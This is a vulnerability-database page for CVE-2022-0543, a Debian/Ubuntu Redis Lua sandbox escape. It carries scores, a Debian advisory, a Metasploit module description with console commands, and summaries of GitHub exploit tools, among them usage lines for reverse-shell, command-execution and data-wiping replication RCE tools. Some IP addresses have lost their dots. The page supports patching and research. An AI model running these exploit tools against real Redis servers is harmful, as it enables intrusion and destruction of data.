CVE-2022-0543

Published: 18/02/2022 Updated: 29/09/2023
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Redis, a persistent key-value database, is prone to a (Debian-specific) Lua sandbox escape due to a packaging issue, which could result in remote code execution.

Vulnerable Product

redis redis -

Vendor Advisories

Debian Bug report logs - #1005787 redis: CVE-2022-0543. Package: redis; Maintainer for redis is Chris Lamb <lamby@debian.org>; Source for redis is src:redis (PTS, buildd, popcon). Reported by: "Chris Lamb" <lamby@debian.org>. Date: Mon, 14 Feb 2022 22:39:02 UTC. Severity: grave. Tags: security. Found in versions redis/5: ...
Reginaldo Silva discovered a (Debian-specific) Lua sandbox escape in Redis, a persistent key-value database. For the oldstable distribution (buster), this problem has been fixed in version 5:5.0.14-1+deb10u2. For the stable distribution (bullseye), this problem has been fixed in version 5:6.0.16-1+deb11u2. We recommend that you upgrade your redis p ...

Exploits

This Metasploit module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical redis deployment (not docker), ...

Metasploit Modules

Redis Lua Sandbox Escape

This module exploits CVE-2022-0543, a Lua-based Redis sandbox escape. The vulnerability was introduced by Debian and Ubuntu Redis packages that insufficiently sanitized the Lua environment. The maintainers failed to disable the package interface, allowing attackers to load arbitrary libraries. On a typical `redis` deployment (not docker), this module achieves execution as the `redis` user. Debian/Ubuntu packages run Redis using systemd with the "MemoryDenyWriteExecute" permission, which limits some of what an attacker can do. For example, staged meterpreter will fail when attempting to use mprotect. As such, stageless meterpreter is the preferred payload. Redis can be configured with authentication or not. This module will work with either configuration (provided you provide the correct authentication details). This vulnerability could theoretically be exploited across a few architectures: i386, arm, ppc, etc. However, the module only supports x86_64, which is likely to be the most popular version.

msf > use exploit/linux/redis/redis_debian_sandbox_escape
msf exploit(redis_debian_sandbox_escape) > show targets
    ...targets...
msf exploit(redis_debian_sandbox_escape) > set TARGET <target-id>
msf exploit(redis_debian_sandbox_escape) > show options
    ...show and set options...
msf exploit(redis_debian_sandbox_escape) > exploit

Github Repositories

Shared HTB: A Medium-difficulty Linux box created by Nauten that will lead us to retrieve, through an SQL injection, the password hash of a user in the database behind a Prestashop site. It will then let us compromise a second user by exploiting ...

Zscan a scan blasting tool set

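Zscan a scan blasting tool set. 📄 English document. For update details, see the log. Result output format: screenshots of part of the output, in two stages. The first stage is the output produced during scanning, starting once host liveness detection has finished; the second stage collates all scan results, starting from the "port result list" output. Introduction 🎉 Zscan is an open-source intranet port scanner, ...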

CVE-2022-0543_RCE, Redis Lua sandbox bypass command execution

CVE-2022-0543: CVE-2022-0543_RCE, Redis Lua sandbox bypass command execution. Usage: python3 CVE-2022-0543.py

Redis RCE through Lua Sandbox Escape vulnerability

CVE-2022-0543: Fully featured exploit for Redis RCE through Lua Sandbox Escape vulnerability. Based on thesecmaster.com/how-to-fix-cve-2022-0543-a-critical-lua-sandbox-escape-vulnerability-in-redis/. Features: Automatic reverse shell (-I + -P); Single command execution (-x); Basic shell (Default). TO DO: Need better checks to prevent false-positives. DISCLAIMER: This scr

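Two-in-one detection and exploitation script for Redis unauthorized access and redis_CVE-2022-0543

redisHack: Two-in-one detection and exploitation script for Redis unauthorized access and redis_CVE-2022-0543. Usage:

A database automated privilege-escalation tool written in Go, supporting privilege escalation, command execution and brute forcing for Mysql, MSSQL, Postgresql, Oracle and Redis databases, as well as SSH connections

Redis: Connect to redis to get a sql shell: go run \maingo -redis -rhost 192168111211 -rport 6379 -cli Master-slave replication RCE: //Linux go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -so expso go run \maingo -redis -rhost 192168111211 -lhost 1921681110 -exec -console -so expso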

Redis primary/secondary replication RCE

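Redis primary/secondary replication RCE: the Go version of the redis master-slave replication RCE. It can be compiled and used standalone, and is integrated into the redis exploitation module of zscan's exploit. CVE-2022-0543 Redis Lua sandbox escape RCE was also added and works out of the box. Usage: Usage of /redis-rce: -dstpath string set target path(上传文件模式中的目标路径) -exec use execute the comman

Redis sandbox escape (CVE-2022-0543) POC & EXP

CVE-2022-0543 1. Introduction: Redis sandbox escape vulnerability (CVE-2022-0543) POC & EXP. 2. Usage: RedisRCE -help (view help information) RedisRCE -h 1921680100:6379 (connect without a password) // enter q to exit the program RedisRCE -h 1921680100:6379 -p 123456 (connect with a password) 3. Disclaimer: This tool is for learning, research and self-checking only. It should not be used for illegal ...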

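Redis exploitation tool

Redis exploitation tool. Statement: This tool is for personal security research and study only. Any direct or indirect consequences and losses caused by distributing or using this tool are the sole responsibility of the user; the tool's author bears no responsibility for them. Note: master-slave replication wipes the data, master-slave replication wipes the data, master-slave replication wipes the data. Use with care! Use with care! Use with ...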